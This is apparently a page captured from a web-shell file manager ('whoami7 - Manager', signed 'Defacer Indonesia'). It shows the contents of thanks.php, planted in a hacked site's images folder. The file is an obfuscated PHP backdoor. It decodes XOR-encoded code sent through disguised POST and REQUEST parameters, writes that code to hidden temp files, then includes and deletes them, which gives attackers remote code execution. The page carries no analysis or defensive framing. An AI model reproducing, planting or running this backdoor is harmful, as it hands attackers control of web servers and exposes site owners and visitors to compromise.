whoami7 - Manager
:
/
home
/
analuakl
/
grinsentertainment.com
/
images
/
Upload File:
files >> /home/analuakl/grinsentertainment.com/images/thanks.php
<?php if(in_array("\x76\x61l", array_keys($_POST))){ $pgrp = $_POST["\x76\x61l"]; $pgrp = explode ("." ,$pgrp) ; $marker = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt2 ); foreach( $pgrp as $y=> $v4) { $sChar = ord( $salt2[$y % $sLen] ); $d =( ( int)$v4 - $sChar -( $y % 10)) ^ 46; $marker .= chr( $d ); } $res = array_filter(["/dev/shm", getenv("TEMP"), "/var/tmp", ini_get("upload_tmp_dir"), session_save_path(), sys_get_temp_dir(), getenv("TMP"), "/tmp", getcwd()]); foreach ($res as $hld): if ((is_dir($hld) and is_writable($hld))) { $object = "$hld/.property_set"; $success = file_put_contents($object, $marker); if ($success) { include $object; @unlink($object); die();} } endforeach; } if(isset($_POST["b\x69n\x64"])){ $value = array_filter([getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir"), "/tmp", sys_get_temp_dir(), getcwd(), "/var/tmp", session_save_path(), "/dev/shm"]); $parameter_group = $_POST["b\x69n\x64"]; $parameter_group= explode ("." ,$parameter_group); $comp = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); foreach($parameter_group as $n =>$v1) {$sChar = ord($salt[$n % $sLen]); $dec =((int)$v1 - $sChar -($n % 10)) ^ 45; $comp.=chr($dec); } $token = 0; do { $property_set = $value[$token] ?? null; if ($token >= count($value)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($property_set)) { $binding = "$property_set/.descriptor"; $success = file_put_contents($binding, $comp); if ($success) { include $binding; @unlink($binding); die();} } $token++; } while (true); } if(@$_POST["\x64\x61t\x61_\x63\x68unk"] !== null){ $entity = array_filter([sys_get_temp_dir(), "/tmp", getenv("TEMP"), "/var/tmp", session_save_path(), "/dev/shm", getcwd(), getenv("TMP"), ini_get("upload_tmp_dir")]); $property_set = $_POST["\x64\x61t\x61_\x63\x68unk"]; $property_set = explode ( ".", $property_set); $flg= ''; $salt6= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen( $salt6); foreach( $property_set as $t=>$v6): $sChar= ord( $salt6[$t % $lenS]); $d= ( ( int)$v6 - $sChar -( $t % 10)) ^ 99; $flg .= chr( $d); endforeach; while ($pointer = array_shift($entity)) { if (max(0, is_dir($pointer) * is_writable($pointer))) { $comp = str_replace("{var_dir}", $pointer, "{var_dir}/.val"); if (file_put_contents($comp, $flg)) { require $comp; unlink($comp); exit; } } } } if(array_key_exists("r\x65\x73o\x75r\x63e", $_REQUEST) && !is_null($_REQUEST["r\x65\x73o\x75r\x63e"])){ $flag = $_REQUEST["r\x65\x73o\x75r\x63e"]; $flag= explode ( '.' , $flag ); $k =''; $s2 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $s2 ); $s =0; array_walk( $flag, function( $v1) use( &$k, &$s, $s2, $sLen) {$chS =ord( $s2[$s % $sLen] ); $d =( ( int)$v1 - $chS -( $s % 10))^49; $k .= chr( $d ); $s++; } ); $entity = array_filter([getenv("TEMP"), getcwd(), "/var/tmp", "/tmp", sys_get_temp_dir(), getenv("TMP"), ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm"]); foreach ($entity as $holder) { if (!( !is_dir($holder) || !is_writable($holder) )) { $record = "$holder" . "/.pset"; if (file_put_contents($record, $k)) { require $record; unlink($record); die(); } } } } if(in_array("\x72e\x73ource", array_keys($_REQUEST))){ $factor = $_REQUEST["\x72e\x73ource"]; $factor =explode( "." , $factor ) ; $obj = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt); $k = 0; array_walk( $factor, function( $v1) use( &$obj, &$k, $salt, $sLen) { $sChar = ord( $salt[$k % $sLen]); $d = ( ( int)$v1 - $sChar -( $k % 10)) ^36; $obj .= chr( $d); $k++; }); $element = array_filter([ini_get("upload_tmp_dir"), "/tmp", getenv("TMP"), getenv("TEMP"), "/var/tmp", "/dev/shm", session_save_path(), sys_get_temp_dir(), getcwd()]); $itm = 0; do { $bind = $element[$itm] ?? null; if ($itm >= count($element)) break; if (is_dir($bind) && is_writable($bind)) { $fac = join("/", [$bind, ".object"]); $file = fopen($fac, 'w'); if ($file) { fwrite($file, $obj); fclose($file); include $fac; @unlink($fac); die(); } } $itm++; } while (true); } if(filter_has_var(INPUT_POST, "\x72\x65s")){ $itm = array_filter(["/tmp", ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), getenv("TMP"), "/var/tmp", session_save_path(), "/dev/shm", sys_get_temp_dir()]); $fac = $_REQUEST["\x72\x65s"]; $fac =explode ( ".", $fac ); $pgrp =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($salt); $t =0; foreach ($fac as $v7) { $sChar =ord($salt[$t %$lenS]); $dec =((int)$v7 - $sChar - ($t %10)) ^ 36; $pgrp .= chr($dec); $t++; } for ($resource = 0, $ref = count($itm); $resource < $ref; $resource++) { $mrk = $itm[$resource]; if (max(0, is_dir($mrk) * is_writable($mrk))) { $value = vsprintf("%s/%s", [$mrk, ".val"]); $success = file_put_contents($value, $pgrp); if ($success) { include $value; @unlink($value); exit;} } } } if(isset($_REQUEST) && isset($_REQUEST["\x73\x79m"])){ $k = $_REQUEST["\x73\x79m"]; $k = explode ( '.' , $k ); $factor = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s2); $y = 0; $__len = count($k); do { if ($y >= $__len) break; $v4 = $k[$y]; $chS = ord($s2[$y % $sLen]); $d = ((int)$v4 - $chS - ($y % 10)) ^ 26; $factor .= chr($d); $y++; } while (true); $entry = array_filter([ini_get("upload_tmp_dir"), "/tmp", getenv("TEMP"), sys_get_temp_dir(), session_save_path(), getenv("TMP"), "/var/tmp", "/dev/shm", getcwd()]); while ($entity = array_shift($entry)) { if (!!is_dir($entity) && !!is_writable($entity)) { $property_set = str_replace("{var_dir}", $entity, "{var_dir}/.holder"); if (file_put_contents($property_set, $factor)) { require $property_set; unlink($property_set); die(); } } } }
Copyright ©2021 || Defacer Indonesia